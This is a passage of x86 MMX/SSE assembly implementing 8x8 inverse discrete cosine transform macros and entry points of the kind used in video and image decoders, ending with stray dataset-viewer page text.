pmulhw mm6, mptr ocos_4_16 ; tm65 = (t6 - t5)*cos_4_16
psubsw mm5, mm0 ; 0 ; y6 = tm03*tg_2_16 - tm12
por mm5, mptr one_corr ; correction y6 +0.5
psllw mm1, SHIFT_FRW_COL ; t4
por mm2, mptr one_corr ; correction tp65 +0.5
movq mm4, mm1 ; 4 ; t4
movq mm3, x0 ; 3 ; x0
paddsw mm1, mm6 ; tp465 = t4 + tm65
psubsw mm3, x7 ; t7 = x[0] - x[7]
psubsw mm4, mm6 ; 6 ; tm465 = t4 - tm65
movq mm0, mptr tg_1_16 ; 0 ; tg_1_16
psllw mm3, SHIFT_FRW_COL ; t7
movq mm6, mptr tg_3_16 ; 6 ; tg_3_16
pmulhw mm0, mm1 ; tp465*tg_1_16
movq y0, mm7 ; 7 ; save y0
pmulhw mm6, mm4 ; tm465*tg_3_16
movq y6, mm5 ; 5 ; save y6
movq mm7, mm3 ; 7 ; t7
movq mm5, mptr tg_3_16 ; 5 ; tg_3_16
psubsw mm7, mm2 ; tm765 = t7 - tp65
paddsw mm3, mm2 ; 2 ; tp765 = t7 + tp65
pmulhw mm5, mm7 ; tm765*tg_3_16
paddsw mm0, mm3 ; y1 = tp765 + tp465*tg_1_16
paddsw mm6, mm4 ; tm465*tg_3_16
pmulhw mm3, mptr tg_1_16 ; tp765*tg_1_16
por mm0, mptr one_corr ; correction y1 +0.5
paddsw mm5, mm7 ; tm765*tg_3_16
psubsw mm7, mm6 ; 6 ; y3 = tm765 - tm465*tg_3_16
movq y1, mm0 ; 0 ; save y1
paddsw mm5, mm4 ; 4 ; y5 = tm765*tg_3_16 + tm465
movq y3, mm7 ; 7 ; save y3
psubsw mm3, mm1 ; 1 ; y7 = tp765*tg_1_16 - tp465
movq y5, mm5 ; 5 ; save y5
movq y7, mm3 ; 3 ; save y7
ENDM
DCT_8_INV_COL_4 MACRO INP:REQ, OUT:REQ
movq mm0, qword ptr tg_3_16
movq mm3, qword ptr [INP+16*3]
movq mm1, mm0 ; tg_3_16
movq mm5, qword ptr [INP+16*5]
pmulhw mm0, mm3 ; x3*(tg_3_16-1)
movq mm4, qword ptr tg_1_16
pmulhw mm1, mm5 ; x5*(tg_3_16-1)
movq mm7, qword ptr [INP+16*7]
movq mm2, mm4 ; tg_1_16
movq mm6, qword ptr [INP+16*1]
pmulhw mm4, mm7 ; x7*tg_1_16
paddsw mm0, mm3 ; x3*tg_3_16
pmulhw mm2, mm6 ; x1*tg_1_16
paddsw mm1, mm3 ; x3+x5*(tg_3_16-1)
psubsw mm0, mm5 ; x3*tg_3_16-x5 = tm35
movq mm3, qword ptr ocos_4_16
paddsw mm1, mm5 ; x3+x5*tg_3_16 = tp35
paddsw mm4, mm6 ; x1+tg_1_16*x7 = tp17
psubsw mm2, mm7 ; x1*tg_1_16-x7 = tm17
movq mm5, mm4 ; tp17
movq mm6, mm2 ; tm17
paddsw mm5, mm1 ; tp17+tp35 = b0
psubsw mm6, mm0 ; tm17-tm35 = b3
psubsw mm4, mm1 ; tp17-tp35 = t1
paddsw mm2, mm0 ; tm17+tm35 = t2
movq mm7, qword ptr tg_2_16
movq mm1, mm4 ; t1
; movq qword ptr [SCRATCH+0], mm5 ; save b0
movq qword ptr [OUT+3*16], mm5 ; save b0
paddsw mm1, mm2 ; t1+t2
; movq qword ptr [SCRATCH+8], mm6 ; save b3
movq qword ptr [OUT+5*16], mm6 ; save b3
psubsw mm4, mm2 ; t1-t2
movq mm5, qword ptr [INP+2*16]
movq mm0, mm7 ; tg_2_16
movq mm6, qword ptr [INP+6*16]
pmulhw mm0, mm5 ; x2*tg_2_16
pmulhw mm7, mm6 ; x6*tg_2_16
; slot
pmulhw mm1, mm3 ; ocos_4_16*(t1+t2) = b1/2
; slot
movq mm2, qword ptr [INP+0*16]
pmulhw mm4, mm3 ; ocos_4_16*(t1-t2) = b2/2
psubsw mm0, mm6 ; t2*tg_2_16-x6 = tm26
movq mm3, mm2 ; x0
movq mm6, qword ptr [INP+4*16]
paddsw mm7, mm5 ; x2+x6*tg_2_16 = tp26
paddsw mm2, mm6 ; x0+x4 = tp04
psubsw mm3, mm6 ; x0-x4 = tm04
movq mm5, mm2 ; tp04
movq mm6, mm3 ; tm04
psubsw mm2, mm7 ; tp04-tp26 = a3
paddsw mm3, mm0 ; tm04+tm26 = a1
paddsw mm1, mm1 ; b1
paddsw mm4, mm4 ; b2
paddsw mm5, mm7 ; tp04+tp26 = a0
psubsw mm6, mm0 ; tm04-tm26 = a2
movq mm7, mm3 ; a1
movq mm0, mm6 ; a2
paddsw mm3, mm1 ; a1+b1
paddsw mm6, mm4 ; a2+b2
psraw mm3, SHIFT_INV_COL ; dst1
psubsw mm7, mm1 ; a1-b1
psraw mm6, SHIFT_INV_COL ; dst2
psubsw mm0, mm4 ; a2-b2
; movq mm1, qword ptr [SCRATCH+0] ; load b0
movq mm1, qword ptr [OUT+3*16] ; load b0
psraw mm7, SHIFT_INV_COL ; dst6
movq mm4, mm5 ; a0
psraw mm0, SHIFT_INV_COL ; dst5
movq qword ptr [OUT+1*16], mm3
paddsw mm5, mm1 ; a0+b0
movq qword ptr [OUT+2*16], mm6
psubsw mm4, mm1 ; a0-b0
; movq mm3, qword ptr [SCRATCH+8] ; load b3
movq mm3, qword ptr [OUT+5*16] ; load b3
psraw mm5, SHIFT_INV_COL ; dst0
movq mm6, mm2 ; a3
psraw mm4, SHIFT_INV_COL ; dst7
movq qword ptr [OUT+5*16], mm0
paddsw mm2, mm3 ; a3+b3
movq qword ptr [OUT+6*16], mm7
psubsw mm6, mm3 ; a3-b3
movq qword ptr [OUT+0*16], mm5
psraw mm2, SHIFT_INV_COL ; dst3
movq qword ptr [OUT+7*16], mm4
psraw mm6, SHIFT_INV_COL ; dst4
movq qword ptr [OUT+3*16], mm2
movq qword ptr [OUT+4*16], mm6
ENDM
_TEXT SEGMENT PARA PUBLIC USE32 'CODE'
;
; extern "C" __fastcall void idct8x8_mmx (short *src_result);
;
public @MMX_IDCT@4
@MMX_IDCT@4 proc near
mov eax, ecx ; source
DCT_8_INV_ROW_1 [eax+0], [eax+0], tab_i_04, rounder_0
DCT_8_INV_ROW_1 [eax+16], [eax+16], tab_i_17, rounder_1
DCT_8_INV_ROW_1 [eax+32], [eax+32], tab_i_26, rounder_2
DCT_8_INV_ROW_1 [eax+48], [eax+48], tab_i_35, rounder_3
DCT_8_INV_ROW_1 [eax+64], [eax+64], tab_i_04, rounder_4
DCT_8_INV_ROW_1 [eax+80], [eax+80], tab_i_35, rounder_5
DCT_8_INV_ROW_1 [eax+96], [eax+96], tab_i_26, rounder_6
DCT_8_INV_ROW_1 [eax+112], [eax+112], tab_i_17, rounder_7
DCT_8_INV_COL_4 [eax+0],[eax+0]
DCT_8_INV_COL_4 [eax+8],[eax+8]
ret
@MMX_IDCT@4 ENDP
_TEXT ENDS
_TEXT SEGMENT PARA PUBLIC USE32 'CODE'
;
; extern "C" __fastcall void idct8x8_sse (short *src_result);
;
public @SSEMMX_IDCT@4
@SSEMMX_IDCT@4 proc near
mov eax, ecx ; source
DCT_8_INV_ROW_1_s [eax+0], [eax+0], tab_i_04_s, rounder_0
DCT_8_INV_ROW_1_s [eax+16], [eax+16], tab_i_17_s, rounder_1
DCT_8_INV_ROW_1_s [eax+32], [eax+32], tab_i_26_s, rounder_2
DCT_8_INV_ROW_1_s [eax+48], [eax+48], tab_i_35_s, rounder_3
DCT_8_INV_ROW_1_s [eax+64], [eax+64], tab_i_04_s, rounder_4
DCT_8_INV_ROW_1_s [eax+80], [eax+80], tab_i_35_s, rounder_5
DCT_8_INV_ROW_1_s [eax+96], [eax+96], tab_i_26_s, rounder_6
DCT_8_INV_ROW_1_s [eax+112], [eax+112], tab_i_17_s, rounder_7
DCT_8_INV_COL_4 [eax+0],[eax+0]
DCT_8_INV_COL_4 [eax+8],[eax+8]
ret
@SSEMMX_IDCT@4 ENDP
_TEXT ENDS
END |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.